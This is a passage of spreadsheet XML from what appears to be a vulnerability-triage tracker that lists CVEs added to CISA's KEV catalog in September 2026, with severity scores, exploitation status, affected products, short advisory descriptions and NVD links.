      <c r="Q11" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="R11" s="5" t="inlineStr"/>
      <c r="S11"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11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76461</t>
        </is>
      </c>
      <c r="D12" s="5" t="inlineStr"/>
      <c r="E12" s="5" t="inlineStr"/>
      <c r="F12" s="5" t="inlineStr"/>
      <c r="G12" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H12" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I12" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr">
        <is>
          <t>cisco:secure email gateway</t>
        </is>
      </c>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr"/>
      <c r="P12" s="5" t="inlineStr"/>
      <c r="Q12" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="R12" s="5" t="inlineStr"/>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>Cisco AsyncOS software for Cisco Secure Email Gateway (SEG) contains a SQL injection vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands with root privileges on the underlying operating system.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76461</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85706</t>
        </is>
      </c>
      <c r="D13" s="5" t="inlineStr"/>
      <c r="E13" s="5" t="inlineStr"/>
      <c r="F13" s="5" t="inlineStr"/>
      <c r="G13" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H13" s="5" t="n">
        <v>0.12</v>
      </c>
      <c r="I13" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr">
        <is>
          <t>gitlab:community edition and enterprise edition</t>
        </is>
      </c>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr"/>
      <c r="P13" s="5" t="inlineStr"/>
      <c r="Q13" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="R13" s="5" t="inlineStr"/>
      <c r="S13"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13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85706</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86060</t>
        </is>
      </c>
      <c r="D14" s="5" t="inlineStr"/>
      <c r="E14" s="5" t="inlineStr"/>
      <c r="F14" s="5" t="inlineStr"/>
      <c r="G14" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H14" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I14" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr"/>
      <c r="P14" s="5" t="inlineStr"/>
      <c r="Q14" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="R14" s="5" t="inlineStr"/>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>MikroTik RouterOS contains an improper neutralization of argument delimiters in a command vulnerability which allows an attacker to change the trusted RouterOS policy mask, leading to privilege escalation.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86060</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86218</t>
        </is>
      </c>
      <c r="D15" s="5" t="inlineStr"/>
      <c r="E15" s="5" t="inlineStr"/>
      <c r="F15" s="5" t="inlineStr"/>
      <c r="G15" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H15" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I15" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr">
        <is>
          <t>n-able:n-central</t>
        </is>
      </c>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr"/>
      <c r="P15" s="5" t="inlineStr"/>
      <c r="Q15" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="R15" s="5" t="inlineStr"/>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>N-able N-central contains a static code injection vulnerability that could allow for pre-authentication remote code execution.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86218</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87886</t>
        </is>
      </c>
      <c r="D16" s="5" t="inlineStr"/>
      <c r="E16" s="5" t="inlineStr"/>
      <c r="F16" s="5" t="inlineStr"/>
      <c r="G16" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr">
        <is>
          <t>acronis:backup</t>
        </is>
      </c>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>KEV</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr"/>
      <c r="P16" s="5" t="inlineStr"/>
      <c r="Q16" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="R16" s="5" t="inlineStr"/>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>Acronis Backup plugin for cPanel &amp; WHM and extension for Plesk contains an incorrect default permissions vulnerability that could allow for privilege escalation.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87886</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T16"/>
  <conditionalFormatting sqref="E2:E1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CVE-2026-84869</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.9</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>7d616e1a-3288-43b1-a0dd-0a65d3e70a49</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>connectwise:screenconnect</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-862</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>A condition in the ScreenConnect client may allow files to be transferred and executed through an active remote session without authorization or Host confirmation in certain circumstances. ScreenConnect servers are not impacted.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84869</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81963</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-59</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81963</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85880</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H4" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-908</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85880</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58704</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H5" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I5" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr">
        <is>
          <t>google:pixel</t>
        </is>
      </c>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr"/>
      <c r="P5" s="5" t="inlineStr"/>
      <c r="Q5" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-693</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>Google Pixel devices contain an improper authorization vulnerability in the cellular modem. A logic error may allow an attacker to bypass permission checks and escalate privileges.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58704</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87491</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H6" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I6" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr">
        <is>
          <t>google:chromium v8</t>
        </is>
      </c>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr"/>
      <c r="P6" s="5" t="inlineStr"/>
      <c r="Q6" s="5" t="inlineStr">
        <is>
          <t>2026-09-23</t>
        </is>
      </c>
      <c r="R6" s="5" t="inlineStr"/>
      <c r="S6" s="5"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T6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87491</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-25249</t>
        </is>
      </c>
      <c r="D7" s="5" t="inlineStr"/>
      <c r="E7" s="5" t="inlineStr"/>
      <c r="F7" s="5" t="inlineStr"/>
      <c r="G7" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H7" s="5" t="n">
        <v>0.024</v>
      </c>
      <c r="I7" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>fortinet:multiple products</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr"/>
      <c r="P7" s="5" t="inlineStr"/>
      <c r="Q7" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="R7" s="5" t="inlineStr"/>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>Fortinet FortiOS, FortiSwitchManager, and FortiSASE contain a heap-based buffer overflow vulnerability that allows an attacker to execute unauthorized code or commands via specially crafted packets.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-25249</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19490</t>
        </is>
      </c>
      <c r="D8" s="5" t="inlineStr"/>
      <c r="E8" s="5" t="inlineStr"/>
      <c r="F8" s="5" t="inlineStr"/>
      <c r="G8" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H8" s="5" t="n">
        <v>0.056</v>
      </c>
      <c r="I8" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler</t>
        </is>
      </c>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr"/>
      <c r="P8" s="5" t="inlineStr"/>
      <c r="Q8" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S8"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T8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19490</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20079</t>
        </is>
      </c>
      <c r="D9" s="5" t="inlineStr"/>
      <c r="E9" s="5" t="inlineStr"/>
      <c r="F9" s="5" t="inlineStr"/>
      <c r="G9" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H9" s="5" t="n">
        <v>0.758</v>
      </c>
      <c r="I9" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K9" s="5" t="inlineStr">
        <is>
          <t>cisco:secure firewall management center (fmc) and security cloud control (scc) firewall management</t>
        </is>
      </c>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr"/>
      <c r="P9" s="5" t="inlineStr"/>
      <c r="Q9" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="R9" s="5" t="inlineStr"/>
      <c r="S9"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T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20079</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42016</t>
        </is>
      </c>
      <c r="D10" s="5" t="inlineStr"/>
      <c r="E10" s="5" t="inlineStr"/>
      <c r="F10" s="5" t="inlineStr"/>
      <c r="G10" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H10" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I10" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr">
        <is>
          <t>jfrog:artifactory</t>
        </is>
      </c>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr"/>
      <c r="P10" s="5" t="inlineStr"/>
      <c r="Q10" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="R10" s="5" t="inlineStr"/>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>JFrog Artifactory contains an incorrect authorization vulnerability that leads to a privilege escalation attack due to a validation check of the token signature/issuer and not the token’s scope.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42016</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42018</t>
        </is>
      </c>
      <c r="D11" s="5" t="inlineStr"/>
      <c r="E11" s="5" t="inlineStr"/>
      <c r="F11" s="5" t="inlineStr"/>
      <c r="G11" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H11" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I11" s="5" t="inlineStr">
        <is>
          <t>none</t>
        </is>
      </c>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr">
        <is>
          <t>jfrog:artifactory</t>
        </is>
      </c>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr"/>
      <c r="P11" s="5" t="inlineStr"/>
      <c r="Q11" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="R11" s="5" t="inlineStr"/>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>JFrog Artifactory contains an improper authentication vulnerability that could return an internal anonymous-user token to an unauthenticated caller when anonymous access is disabled, potentially exposing sensitive resources.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42018</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67277</t>
        </is>
      </c>
      <c r="D12" s="5" t="inlineStr"/>
      <c r="E12" s="5" t="inlineStr"/>
      <c r="F12" s="5" t="inlineStr"/>
      <c r="G12" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H12" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I12" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr"/>
      <c r="P12" s="5" t="inlineStr"/>
      <c r="Q12" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="R12" s="5" t="inlineStr"/>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>MikroTik RouterOS contains a missing authentication for critical function vulnerability which allows kernel memory disclosure and denial of service in the btest service.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67277</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75650</t>
        </is>
      </c>
      <c r="D13" s="5" t="inlineStr"/>
      <c r="E13" s="5" t="inlineStr"/>
      <c r="F13" s="5" t="inlineStr"/>
      <c r="G13" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H13" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I13" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce and magento</t>
        </is>
      </c>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr"/>
      <c r="P13" s="5" t="inlineStr"/>
      <c r="Q13" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="R13" s="5" t="inlineStr"/>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce and Magento Open Source contain an improper neutralization of special elements used in a template engine vulnerability that could allow an attacker to execute arbitrary code.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75650</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76460</t>
        </is>
      </c>
      <c r="D14" s="5" t="inlineStr"/>
      <c r="E14" s="5" t="inlineStr"/>
      <c r="F14" s="5" t="inlineStr"/>
      <c r="G14" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
